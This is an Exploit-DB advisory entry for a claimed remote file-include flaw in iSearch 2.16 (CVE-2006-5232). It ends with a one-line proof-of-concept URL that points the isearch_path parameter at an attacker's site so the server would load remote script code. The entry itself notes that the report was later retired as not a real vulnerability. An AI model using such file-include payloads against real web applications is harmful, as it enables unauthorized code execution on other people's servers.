ISearch 2.16 ISEARCH_PATH Parameter Remote File Include Vulnerability

2006-10-09T00:00:00
ID EDB-ID:28772
Type exploitdb
Reporter MoHaNdKo
Modified 2006-10-09T00:00:00

Description

ISearch 2.16 ISEARCH_PATH Parameter Remote File Include Vulnerability. CVE-2006-5232. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20401/info

iSearch is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

iSearch 2.16 and prior versions are reported affected.

Update: This BID is retired; further information has revealed that this is not a vulnerability.

htpp://www.example.com/[scerpitPath]/index.php?isearch_path=http://attacker's site